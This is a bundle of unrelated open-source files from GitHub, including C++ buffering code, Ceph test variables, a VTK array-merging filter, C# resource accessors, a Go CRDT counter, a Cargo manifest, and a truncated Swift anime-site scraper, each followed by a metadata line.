      throw Invalid_Argument("m_final_minimum > m_main_block_mod");

   m_buffer.resize(2 * m_main_block_mod);
   m_buffer_pos = 0;
   }

/*
* Buffer input into blocks, trying to minimize copying
*/
void Buffered_Filter::write(const uint8_t input[], size_t input_size)
   {
   if(!input_size)
      return;

   // If buffered bytes plus new input reach at least one full block beyond
   // the final-minimum reserve, top up the buffer and flush whole blocks.
   if(m_buffer_pos + input_size >= m_main_block_mod + m_final_minimum)
      {
      size_t to_copy = std::min<size_t>(m_buffer.size() - m_buffer_pos, input_size);

      copy_mem(&m_buffer[m_buffer_pos], input, to_copy);
      m_buffer_pos += to_copy;

      input += to_copy;
      input_size -= to_copy;

      // Consume as many whole blocks as possible while still leaving
      // m_final_minimum bytes (counting the remaining input) unconsumed.
      size_t total_to_consume =
         round_down(std::min(m_buffer_pos,
                             m_buffer_pos + input_size - m_final_minimum),
                    m_main_block_mod);

      buffered_block(m_buffer.data(), total_to_consume);

      m_buffer_pos -= total_to_consume;

      // Shift the unconsumed tail to the front of the buffer.
      copy_mem(m_buffer.data(), m_buffer.data() + total_to_consume, m_buffer_pos);
      }

   // Pass full blocks of the remaining input straight through without
   // copying, again holding back at least m_final_minimum bytes.
   if(input_size >= m_final_minimum)
      {
      size_t full_blocks = (input_size - m_final_minimum) / m_main_block_mod;
      size_t to_copy = full_blocks * m_main_block_mod;

      if(to_copy)
         {
         buffered_block(input, to_copy);

         input += to_copy;
         input_size -= to_copy;
         }
      }

   // Whatever is left stays buffered for the next write() or end_msg().
   copy_mem(&m_buffer[m_buffer_pos], input, input_size);
   m_buffer_pos += input_size;
   }

/*
* Finish/flush operation
*/
void Buffered_Filter::end_msg()
   {
   if(m_buffer_pos < m_final_minimum)
      throw Exception("Buffered filter end_msg without enough input");

   // Flush any whole blocks beyond the final-minimum reserve, then hand the
   // remainder (>= m_final_minimum bytes) to buffered_final().
   size_t spare_blocks = (m_buffer_pos - m_final_minimum) / m_main_block_mod;

   if(spare_blocks)
      {
      size_t spare_bytes = m_main_block_mod * spare_blocks;
      buffered_block(m_buffer.data(), spare_bytes);
      buffered_final(&m_buffer[spare_bytes], m_buffer_pos - spare_bytes);
      }
   else
      {
      buffered_final(m_buffer.data(), m_buffer_pos);
      }

   m_buffer_pos = 0;
   }

}
{ "pile_set_name": "Github" }
---
# ceph-ansible test variables: install Ceph community packages upstream.
ceph_origin: repository
ceph_repository: community
cluster: ceph
# Client-facing and replication networks for the test VMs.
public_network: "192.168.39.0/24"
cluster_network: "192.168.40.0/24"
# NIC names differ between the CentOS and non-CentOS test images.
monitor_interface: "{{ 'eth1' if ansible_distribution == 'CentOS' else 'ens6' }}"
radosgw_interface: "{{ 'eth1' if ansible_distribution == 'CentOS' else 'ens6' }}"
osd_objectstore: "bluestore"
crush_device_class: test
copy_admin_key: true
# OSD backing devices inside the QEMU guests.
devices:
  - /dev/disk/by-id/ata-QEMU_HARDDISK_QM00002
  - /dev/sdc
os_tuning_params:
  - { name: fs.file-max, value: 26234859 }
ceph_conf_overrides:
  global:
    # Single-replica pools are acceptable in this test environment only.
    mon_allow_pool_size_one: true
    mon_warn_on_pool_no_redundancy: false
    osd_pool_default_size: 1
dashboard_enabled: False
# Delays (seconds) used by rolling-update health-check handlers.
handler_health_mon_check_delay: 10
handler_health_osd_check_delay: 10
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8"?> <!-- Copyright (c) 2002-2004 by The Web Services-Interoperability Organization (WS-I) and Certain of its Members. All Rights Reserved. Notice The material contained herein is not a license, either expressly or impliedly, to any intellectual property owned or controlled by any of the authors or developers of this material or WS-I. The material contained herein is provided on an "AS IS" basis and to the maximum extent permitted by applicable law, this material is provided AS IS AND WITH ALL FAULTS, and the authors and developers of this material and WS-I hereby disclaim all other warranties and conditions, either express, implied or statutory, including, but not limited to, any (if any) implied warranties, duties or conditions of merchantability, of fitness for a particular purpose, of accuracy or completeness of responses, of results, of workmanlike effort, of lack of viruses, and of lack of negligence. ALSO, THERE IS NO WARRANTY OR CONDITION OF TITLE, QUIET ENJOYMENT, QUIET POSSESSION, CORRESPONDENCE TO DESCRIPTION OR NON-INFRINGEMENT WITH REGARD TO THIS MATERIAL. IN NO EVENT WILL ANY AUTHOR OR DEVELOPER OF THIS MATERIAL OR WS-I BE LIABLE TO ANY OTHER PARTY FOR THE COST OF PROCURING SUBSTITUTE GOODS OR SERVICES, LOST PROFITS, LOSS OF USE, LOSS OF DATA, OR ANY INCIDENTAL, CONSEQUENTIAL, DIRECT, INDIRECT, OR SPECIAL DAMAGES WHETHER UNDER CONTRACT, TORT, WARRANTY, OR OTHERWISE, ARISING IN ANY WAY OUT OF THIS OR ANY OTHER AGREEMENT RELATING TO THIS MATERIAL, WHETHER OR NOT SUCH PARTY HAD ADVANCE NOTICE OF THE POSSIBILITY OF SUCH DAMAGES. WS-I License Information Use of this WS-I Material is governed by the WS-I Test License and other licenses. Information on these licenses are contained in the README.txt and ReleaseNotes.txt files. By downloading this file, you agree to the terms of these licenses. 
How To Provide Feedback The Web Services-Interoperability Organization (WS-I) would like to receive input, suggestions and other feedback ("Feedback") on this work from a wide variety of industry participants to improve its quality over time. By sending email, or otherwise communicating with WS-I, you (on behalf of yourself if you are an individual, and your company if you are providing Feedback on behalf of the company) will be deemed to have granted to WS-I, the members of WS-I, and other parties that have access to your Feedback, a non-exclusive, non-transferable, worldwide, perpetual, irrevocable, royalty-free license to use, disclose, copy, license, modify, sublicense or otherwise distribute and exploit in any manner whatsoever the Feedback you provide regarding the work. You acknowledge that you have no expectation of confidentiality with respect to any Feedback you provide. You represent and warrant that you have rights to provide this Feedback, and if you are providing Feedback on behalf of a company, you represent and warrant that you have the rights to provide Feedback on behalf of your company. You also acknowledge that WS-I is not required to review, discuss, use, consider or in any way incorporate your Feedback into future versions of its work. If WS-I does incorporate some or all of your Feedback in a future version of the work, it may, but is not obligated to include your name (or, if you are identified as acting on behalf of your company, the name of your company) on a list of contributors to the work. If the foregoing is not acceptable to you and any company on whose behalf you are acting, please do not provide any Feedback. Feedback on this document should be directed to [email protected]. --> <xsd:schema targetNamespace="http://ws-i.org/profiles/basic/1.1/xsd" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <xsd:simpleType name="swaRef"> <xsd:restriction base="xsd:anyURI"/> </xsd:simpleType> </xsd:schema>
{ "pile_set_name": "Github" }
fileFormatVersion: 2 guid: e57bf701e9cb4a94dadf8040bc7df0cd MonoImporter: externalObjects: {} serializedVersion: 2 defaultReferences: [] executionOrder: 0 icon: {instanceID: 0} userData: assetBundleName: assetBundleVariant:
{ "pile_set_name": "Github" }
package api func (c *Sys) Leader() (*LeaderResponse, error) { r := c.c.NewRequest("GET", "/v1/sys/leader") resp, err := c.c.RawRequest(r) if err != nil { return nil, err } defer resp.Body.Close() var result LeaderResponse err = resp.DecodeJSON(&result) return &result, err } type LeaderResponse struct { HAEnabled bool `json:"ha_enabled"` IsSelf bool `json:"is_self"` LeaderAddress string `json:"leader_address"` }
{ "pile_set_name": "Github" }
/* * Copyright (c) 2011-2017, ScalaFX Project * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * Neither the name of the ScalaFX Project nor the * names of its contributors may be used to endorse or promote products * derived from this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE SCALAFX PROJECT OR ITS CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED * AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ package scalafx.scene.layout import javafx.scene.{layout => jfxsl} import scalafx.Includes._ import scalafx.testutil.SimpleSFXDelegateSpec /** * BorderPane Spec tests. * * */ class BorderPaneSpec extends SimpleSFXDelegateSpec[jfxsl.BorderPane, BorderPane](classOf[jfxsl.BorderPane], classOf[BorderPane])
{ "pile_set_name": "Github" }
import _plotly_utils.basevalidators


class CustomdataValidator(_plotly_utils.basevalidators.DataArrayValidator):
    # Generated-style validator for the "customdata" data array of the
    # "scattergl" trace; all behavior comes from DataArrayValidator.
    def __init__(self, plotly_name="customdata", parent_name="scattergl", **kwargs):
        # edit_type defaults to "calc" and role to "data" unless the caller
        # overrides them via kwargs.
        super(CustomdataValidator, self).__init__(
            plotly_name=plotly_name,
            parent_name=parent_name,
            edit_type=kwargs.pop("edit_type", "calc"),
            role=kwargs.pop("role", "data"),
            **kwargs
        )
{ "pile_set_name": "Github" }
MIT License Copyright (c) Sindre Sorhus <[email protected]> (sindresorhus.com) Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
{ "pile_set_name": "Github" }
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head><title></title> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta name="generator" content="Doxygen 1.8.17"/> <link rel="stylesheet" type="text/css" href="search.css"/> <script type="text/javascript" src="defines_0.js"></script> <script type="text/javascript" src="search.js"></script> </head> <body class="SRPage"> <div id="SRIndex"> <div class="SRStatus" id="Loading">Loading...</div> <div id="SRResults"></div> <script type="text/javascript"><!-- /* @license magnet:?xt=urn:btih:cf05388f2679ee054f2beb29a391d25f4e673ac3&amp;dn=gpl-2.0.txt GPL-v2 */ createResults(); /* @license-end */ --></script> <div class="SRStatus" id="Searching">Searching...</div> <div class="SRStatus" id="NoMatches">No Matches</div> <script type="text/javascript"><!-- /* @license magnet:?xt=urn:btih:cf05388f2679ee054f2beb29a391d25f4e673ac3&amp;dn=gpl-2.0.txt GPL-v2 */ document.getElementById("Loading").style.display="none"; document.getElementById("NoMatches").style.display="none"; var searchResults = new SearchResults("searchResults"); searchResults.Search(); /* @license-end */ --></script> </div> </body> </html>
{ "pile_set_name": "Github" }
/*=========================================================================

  Program:   Visualization Toolkit
  Module:    vtkMergeArrays.cxx

  Copyright (c) Kitware, Inc.
  All rights reserved.
  See Copyright.txt or http://www.paraview.org/HTML/Copyright.html for details.

     This software is distributed WITHOUT ANY WARRANTY; without even
     the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
     PURPOSE.  See the above copyright notice for more information.

=========================================================================*/
#include "vtkMergeArrays.h"

#include "vtkCellData.h"
#include "vtkCompositeDataIterator.h"
#include "vtkCompositeDataSet.h"
#include "vtkDataArray.h"
#include "vtkDataSet.h"
#include "vtkFieldData.h"
#include "vtkInformation.h"
#include "vtkInformationVector.h"
#include "vtkObjectFactory.h"
#include "vtkPointData.h"
#include "vtkSmartPointer.h"

vtkStandardNewMacro(vtkMergeArrays);

//------------------------------------------------------------------------------
vtkMergeArrays::vtkMergeArrays() = default;

//------------------------------------------------------------------------------
vtkMergeArrays::~vtkMergeArrays() = default;

//------------------------------------------------------------------------------
// Decide the output name for an incoming array. Returns false when outputFD
// has no array of that name (the array keeps its original name); returns true
// and sets outputArrayName to "<name>_input_<inputIndex>" when a name clash
// with an already-merged array must be avoided.
bool vtkMergeArrays::GetOutputArrayName(
  vtkFieldData* arrays, const char* arrayName, int inputIndex, std::string& outputArrayName)
{
  if (arrays->GetAbstractArray(arrayName) == nullptr)
  {
    return false;
  }
  outputArrayName = std::string(arrayName) + "_input_" + std::to_string(inputIndex);
  return true;
}

//------------------------------------------------------------------------------
// Copy every array of inputFD into outputFD. On a name clash, a renamed
// shallow copy (deep copy for non-vtkDataArray types) is added instead of
// the original, so both inputs' arrays survive in the output.
void vtkMergeArrays::MergeArrays(int inputIndex, vtkFieldData* inputFD, vtkFieldData* outputFD)
{
  if (inputFD == nullptr || outputFD == nullptr)
  {
    return;
  }
  std::string outputArrayName;
  int numArrays = inputFD->GetNumberOfArrays();
  for (int arrayIdx = 0; arrayIdx < numArrays; ++arrayIdx)
  {
    vtkAbstractArray* array = inputFD->GetAbstractArray(arrayIdx);
    if (this->GetOutputArrayName(outputFD, array->GetName(), inputIndex, outputArrayName))
    {
      vtkAbstractArray* newArray = array->NewInstance();
      if (vtkDataArray* newDataArray = vtkDataArray::SafeDownCast(newArray))
      {
        // Data arrays can share their buffers; other array types are copied.
        newDataArray->ShallowCopy(vtkDataArray::SafeDownCast(array));
      }
      else
      {
        newArray->DeepCopy(array);
      }
      newArray->SetName(outputArrayName.c_str());
      outputFD->AddArray(newArray);
      // AddArray took a reference; drop ours without the full Delete path.
      newArray->FastDelete();
    }
    else
    {
      outputFD->AddArray(array);
    }
  }
}

//------------------------------------------------------------------------------
// Merge the field data of one input into the output, attribute type by
// attribute type (points, cells, field data, ...), skipping any attribute
// whose element count differs between input and output.
int vtkMergeArrays::MergeDataObjectFields(vtkDataObject* input, int idx, vtkDataObject* output)
{
  int checks[vtkDataObject::NUMBER_OF_ATTRIBUTE_TYPES];
  for (int attr = 0; attr < vtkDataObject::NUMBER_OF_ATTRIBUTE_TYPES; attr++)
  {
    checks[attr] = output->GetNumberOfElements(attr) == input->GetNumberOfElements(attr) ? 0 : 1;
  }
  // NOTE(review): globalChecks is a plain copy of checks; this looks like a
  // leftover from a distributed variant that would reduce checks across
  // ranks - confirm before simplifying.
  int globalChecks[vtkDataObject::NUMBER_OF_ATTRIBUTE_TYPES];
  for (int i = 0; i < vtkDataObject::NUMBER_OF_ATTRIBUTE_TYPES; ++i)
  {
    globalChecks[i] = checks[i];
  }
  for (int attr = 0; attr < vtkDataObject::NUMBER_OF_ATTRIBUTE_TYPES; attr++)
  {
    if (globalChecks[attr] == 0)
    {
      // only merge arrays when the number of elements in the input and output are the same
      this->MergeArrays(
        idx, input->GetAttributesAsFieldData(attr), output->GetAttributesAsFieldData(attr));
    }
  }
  return 1;
}

//------------------------------------------------------------------------------
// Accept any number of connections on the single input port.
int vtkMergeArrays::FillInputPortInformation(int vtkNotUsed(port), vtkInformation* info)
{
  info->Set(vtkAlgorithm::INPUT_IS_REPEATABLE(), 1);
  return 1;
}

//------------------------------------------------------------------------------
// Shallow-copy the first input into the output (handling composite datasets
// leaf by leaf), then fold the field data of every further input in.
int vtkMergeArrays::RequestData(vtkInformation* vtkNotUsed(request),
  vtkInformationVector** inputVector, vtkInformationVector* outputVector)
{
  int num = inputVector[0]->GetNumberOfInformationObjects();
  if (num < 1)
  {
    return 0;
  }
  // get the output info object
  vtkInformation* outInfo = outputVector->GetInformationObject(0);
  vtkDataObject* output = outInfo->Get(vtkDataObject::DATA_OBJECT());
  vtkInformation* inInfo = inputVector[0]->GetInformationObject(0);
  vtkDataObject* input = inInfo->Get(vtkDataObject::DATA_OBJECT());
  vtkCompositeDataSet* cOutput = vtkCompositeDataSet::SafeDownCast(output);
  if (cOutput)
  {
    // Composite output: copy the structure and shallow-copy each leaf.
    vtkCompositeDataSet* cInput = vtkCompositeDataSet::SafeDownCast(input);
    cOutput->CopyStructure(cInput);
    vtkSmartPointer<vtkCompositeDataIterator> iter;
    iter.TakeReference(cInput->NewIterator());
    iter->InitTraversal();
    for (; !iter->IsDoneWithTraversal(); iter->GoToNextItem())
    {
      if (vtkDataSet* tmpIn = vtkDataSet::SafeDownCast(iter->GetCurrentDataObject()))
      {
        vtkDataSet* tmpOut = tmpIn->NewInstance();
        tmpOut->ShallowCopy(tmpIn);
        cOutput->SetDataSet(iter, tmpOut);
        tmpOut->Delete();
      }
    }
  }
  else
  {
    output->ShallowCopy(input);
  }
  // Merge the remaining inputs' field data into the output.
  for (int idx = 1; idx < num; ++idx)
  {
    inInfo = inputVector[0]->GetInformationObject(idx);
    input = inInfo->Get(vtkDataObject::DATA_OBJECT());
    if (!this->MergeDataObjectFields(input, idx, output))
    {
      return 0;
    }
    vtkCompositeDataSet* cInput = vtkCompositeDataSet::SafeDownCast(input);
    if (cOutput && cInput)
    {
      // For composite inputs, merge each leaf into the matching output leaf.
      vtkSmartPointer<vtkCompositeDataIterator> iter;
      iter.TakeReference(cInput->NewIterator());
      iter->InitTraversal();
      for (; !iter->IsDoneWithTraversal(); iter->GoToNextItem())
      {
        vtkDataObject* tmpIn = iter->GetCurrentDataObject();
        vtkDataObject* tmpOut = cOutput->GetDataSet(iter);
        if (!this->MergeDataObjectFields(tmpIn, idx, tmpOut))
        {
          return 0;
        }
      }
    }
  }
  return 1;
}

//------------------------------------------------------------------------------
void vtkMergeArrays::PrintSelf(ostream& os, vtkIndent indent)
{
  this->Superclass::PrintSelf(os, indent);
}
{ "pile_set_name": "Github" }
//------------------------------------------------------------------------------
// <auto-generated>
//     This code was generated by a tool.
//     Runtime Version:4.0.30319.34209
//
//     Changes to this file may cause incorrect behavior and will be lost if
//     the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------

namespace Solid.Arduino
{
    using System;

    /// <summary>
    ///   A strongly-typed resource class, for looking up localized strings, etc.
    /// </summary>
    // This class was auto-generated by the StronglyTypedResourceBuilder
    // class via a tool like ResGen or Visual Studio.
    // To add or remove a member, edit your .ResX file then rerun ResGen
    // with the /str option, or rebuild your VS project.
    // NOTE(review): do not hand-edit the accessors below — regenerate from
    // Messages.resx instead; any manual change here will be overwritten.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class Messages
    {
        // Lazily-created manager for the Solid.Arduino.Messages resources.
        private static global::System.Resources.ResourceManager resourceMan;

        // Optional culture override applied to every lookup below.
        private static global::System.Globalization.CultureInfo resourceCulture;

        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Messages()
        {
        }

        /// <summary>
        ///   Returns the cached ResourceManager instance used by this class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager
        {
            get
            {
                if (object.ReferenceEquals(resourceMan, null))
                {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("Solid.Arduino.Messages", typeof(Messages).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }

        /// <summary>
        ///   Overrides the current thread's CurrentUICulture property for all
        ///   resource lookups using this strongly typed resource class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture
        {
            get
            {
                return resourceCulture;
            }
            set
            {
                resourceCulture = value;
            }
        }

        /// <summary>
        ///   Looks up a localized string similar to Cannot convert non-BCD data..
        /// </summary>
        internal static string ArgumentEx_CannotConvertBcd
        {
            get { return ResourceManager.GetString("ArgumentEx_CannotConvertBcd", resourceCulture); }
        }

        /// <summary>
        ///   Looks up a localized string similar to Channel number must be between 0 and 15..
        /// </summary>
        internal static string ArgumentEx_ChannelRange0_15
        {
            get { return ResourceManager.GetString("ArgumentEx_ChannelRange0_15", resourceCulture); }
        }

        /// <summary>
        ///   Looks up a localized string similar to String must contain digits only..
        /// </summary>
        internal static string ArgumentEx_DigitStringOnly
        {
            get { return ResourceManager.GetString("ArgumentEx_DigitStringOnly", resourceCulture); }
        }

        /// <summary>
        ///   Looks up a localized string similar to Address must be between 0 and 1,023..
        /// </summary>
        internal static string ArgumentEx_I2cAddressRange
        {
            get { return ResourceManager.GetString("ArgumentEx_I2cAddressRange", resourceCulture); }
        }

        /// <summary>
        ///   Looks up a localized string similar to Interval must be between 0 and 16,383 milliseconds..
        /// </summary>
        internal static string ArgumentEx_I2cInterval
        {
            get { return ResourceManager.GetString("ArgumentEx_I2cInterval", resourceCulture); }
        }

        /// <summary>
        ///   Looks up a localized string similar to Maximum pulse width must be between 0 and 16,383 milliseconds..
        /// </summary>
        internal static string ArgumentEx_MaxPulseWidth
        {
            get { return ResourceManager.GetString("ArgumentEx_MaxPulseWidth", resourceCulture); }
        }

        /// <summary>
        ///   Looks up a localized string similar to Minimum pulse width is greater than maximum pulse width..
        /// </summary>
        internal static string ArgumentEx_MinMaxPulse
        {
            get { return ResourceManager.GetString("ArgumentEx_MinMaxPulse", resourceCulture); }
        }

        /// <summary>
        ///   Looks up a localized string similar to Minimum pulse width must be between 0 and 16,383 milliseconds..
        /// </summary>
        internal static string ArgumentEx_MinPulseWidth
        {
            get { return ResourceManager.GetString("ArgumentEx_MinPulseWidth", resourceCulture); }
        }

        /// <summary>
        ///   Looks up a localized string similar to Value cannot be negative..
        /// </summary>
        internal static string ArgumentEx_NoNegativeValue
        {
            get { return ResourceManager.GetString("ArgumentEx_NoNegativeValue", resourceCulture); }
        }

        /// <summary>
        ///   Looks up a localized string similar to String argument can not be null or empty..
        /// </summary>
        internal static string ArgumentEx_NotNullOrEmpty
        {
            get { return ResourceManager.GetString("ArgumentEx_NotNullOrEmpty", resourceCulture); }
        }

        /// <summary>
        ///   Looks up a localized string similar to Pin number must be between 0 and 127..
        /// </summary>
        internal static string ArgumentEx_PinRange0_127
        {
            get { return ResourceManager.GetString("ArgumentEx_PinRange0_127", resourceCulture); }
        }

        /// <summary>
        ///   Looks up a localized string similar to Pin must be between 0 and 7..
        /// </summary>
        internal static string ArgumentEx_PinRange0_7
        {
            get { return ResourceManager.GetString("ArgumentEx_PinRange0_7", resourceCulture); }
        }

        /// <summary>
        ///   Looks up a localized string similar to Port number must be between 0 and 15..
        /// </summary>
        internal static string ArgumentEx_PortRange0_15
        {
            get { return ResourceManager.GetString("ArgumentEx_PortRange0_15", resourceCulture); }
        }

        /// <summary>
        ///   Looks up a localized string similar to Value must be greater than zero..
        /// </summary>
        internal static string ArgumentEx_PositiveValue
        {
            get { return ResourceManager.GetString("ArgumentEx_PositiveValue", resourceCulture); }
        }

        /// <summary>
        ///   Looks up a localized string similar to Sampling interval must be between 0 and 16,383 milliseconds..
        /// </summary>
        internal static string ArgumentEx_SamplingInterval
        {
            get { return ResourceManager.GetString("ArgumentEx_SamplingInterval", resourceCulture); }
        }

        /// <summary>
        ///   Looks up a localized string similar to Value must be between 0 and 16,383..
        /// </summary>
        internal static string ArgumentEx_ValueRange0_16383
        {
            get { return ResourceManager.GetString("ArgumentEx_ValueRange0_16383", resourceCulture); }
        }

        /// <summary>
        ///   Looks up a localized string similar to Value must be betwen 0 and 255..
        /// </summary>
        // NOTE(review): the resource text itself contains the typo "betwen";
        // fix it in Messages.resx and regenerate (the comment above quotes
        // the stored string verbatim, so it is not wrong by itself).
        internal static string ArgumentEx_ValueRange0_255
        {
            get { return ResourceManager.GetString("ArgumentEx_ValueRange0_255", resourceCulture); }
        }

        /// <summary>
        ///   Looks up a localized string similar to Pin is not supported..
        /// </summary>
        internal static string InvalidOpEx_PinNotSupported
        {
            get { return ResourceManager.GetString("InvalidOpEx_PinNotSupported", resourceCulture); }
        }

        /// <summary>
        ///   Looks up a localized string similar to Commandbyte {0:X} is not implemented..
        /// </summary>
        internal static string NotImplementedEx_Command
        {
            get { return ResourceManager.GetString("NotImplementedEx_Command", resourceCulture); }
        }

        /// <summary>
        ///   Looks up a localized string similar to The command parsing buffer is full..
        /// </summary>
        internal static string OverflowEx_CmdBufferFull
        {
            get { return ResourceManager.GetString("OverflowEx_CmdBufferFull", resourceCulture); }
        }

        /// <summary>
        ///   Looks up a localized string similar to Received message queue is full..
        /// </summary>
        internal static string OverflowEx_MsgBufferFull
        {
            get { return ResourceManager.GetString("OverflowEx_MsgBufferFull", resourceCulture); }
        }

        /// <summary>
        ///   Looks up a localized string similar to The received strings buffer is full..
        /// </summary>
        internal static string OverflowEx_StringBufferFull
        {
            get { return ResourceManager.GetString("OverflowEx_StringBufferFull", resourceCulture); }
        }

        /// <summary>
        ///   Looks up a localized string similar to Wait condition for {0} message timed out..
        /// </summary>
        internal static string TimeoutEx_WaitMessage
        {
            get { return ResourceManager.GetString("TimeoutEx_WaitMessage", resourceCulture); }
        }

        /// <summary>
        ///   Looks up a localized string similar to Wait condition for string read in {0} mode timed out..
        /// </summary>
        internal static string TimeoutEx_WaitStringRequest
        {
            get { return ResourceManager.GetString("TimeoutEx_WaitStringRequest", resourceCulture); }
        }
    }
}
{ "pile_set_name": "Github" }
Connecting to: localhost:5001 Stopped at tests/debugger/do_list.js:15 (jerry-debugger) b do_list.js:18 Breakpoint 1 at tests/debugger/do_list.js:18 (jerry-debugger) b do_list.js:19 Breakpoint 2 at tests/debugger/do_list.js:19 (jerry-debugger) list === Active breakpoints === 1: tests/debugger/do_list.js:18 2: tests/debugger/do_list.js:19 (jerry-debugger) quit
{ "pile_set_name": "Github" }
package crdt import "github.com/satori/go.uuid" // GCounter represent a G-counter in CRDT, which is // a state-based grow-only counter that only supports // increments. type GCounter struct { // ident provides a unique identity to each replica. ident string // counter maps identity of each replica to their // entry values i.e. the counter value they individually // have. counter map[string]int } // NewGCounter returns a *GCounter by pre-assigning a unique // identity to it. func NewGCounter() *GCounter { return &GCounter{ ident: uuid.NewV4().String(), counter: make(map[string]int), } } // Inc increments the GCounter by the value of 1 everytime it // is called. func (g *GCounter) Inc() { g.IncVal(1) } // IncVal allows passing in an arbitrary delta to increment the // current value of counter by. Only positive values are accepted. // If a negative value is provided the implementation will panic. func (g *GCounter) IncVal(incr int) { if incr < 0 { panic("cannot decrement a gcounter") } g.counter[g.ident] += incr } // Count returns the total count of this counter across all the // present replicas. func (g *GCounter) Count() (total int) { for _, val := range g.counter { total += val } return } // Merge combines the counter values across multiple replicas. // The property of idempotency is preserved here across // multiple merges as when no state is changed across any replicas, // the result should be exactly the same everytime. func (g *GCounter) Merge(c *GCounter) { for ident, val := range c.counter { if v, ok := g.counter[ident]; !ok || v < val { g.counter[ident] = val } } }
{ "pile_set_name": "Github" }
# This is an empty schema designed to support # nulldb adapter's requirement for one to exist ActiveRecord::Schema.define(version: 1) do end
{ "pile_set_name": "Github" }
# Crate manifest for mc-crypto-box (MobileCoin crypto-box primitives).
[package]
name = "mc-crypto-box"
version = "1.0.0"
authors = ["MobileCoin"]
edition = "2018"

[dependencies]
aead = "0.3"
aes-gcm = { version = "0.6.0" }
blake2 = { version = "0.9", default-features = false }
digest = { version = "0.9" }
failure = { version = "0.1.5", default-features = false }
hkdf = { version = "0.9.0", default-features = false }
mc-crypto-keys = { path = "../keys", default-features = false }
rand_core = { version = "0.5", default-features = false }

# Fix: Cargo's documented table name is the hyphenated `dev-dependencies`;
# the underscore spelling `[dev_dependencies]` is a deprecated alias.
[dev-dependencies]
mc-util-from-random = { path = "../../util/from-random" }
mc-util-test-helper = { path = "../../util/test-helper" }
{ "pile_set_name": "Github" }
//
//  This file is part of the NineAnimator project.
//
//  Copyright © 2018-2020 Marcus Zhou. All rights reserved.
//
//  NineAnimator is free software: you can redistribute it and/or modify
//  it under the terms of the GNU General Public License as published by
//  the Free Software Foundation, either version 3 of the License, or
//  (at your option) any later version.
//
//  NineAnimator is distributed in the hope that it will be useful,
//  but WITHOUT ANY WARRANTY; without even the implied warranty of
//  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
//  GNU General Public License for more details.
//
//  You should have received a copy of the GNU General Public License
//  along with NineAnimator.  If not, see <http://www.gnu.org/licenses/>.
//

import Foundation
import SwiftSoup

extension NASourceAnimeDao {
    /// Fetches the AnimeDao landing page and parses it into a
    /// `FeaturedContainer` with two lists:
    /// - the `#new` section is mapped to the "latest" (recently updated) list
    /// - the `#recent` section is mapped to the "featured" list
    /// Entries missing an image, title, or link element are skipped
    /// (via `compactMap` returning nil).
    func featured() -> NineAnimatorPromise<FeaturedContainer> {
        self.requestManager.request(
            url: endpointURL,
            handling: .browsing
        )
        .responseString
        .then { responseContent in
            // Parse the whole landing page once, then slice out the two
            // sections of interest.
            let bowl = try SwiftSoup.parse(responseContent)
            let updatedAnimeContainer = try bowl.select("#new")
            let featuredAnimeContainer = try bowl.select("#recent")

            // Recently-updated entries: one direct child <div> per anime,
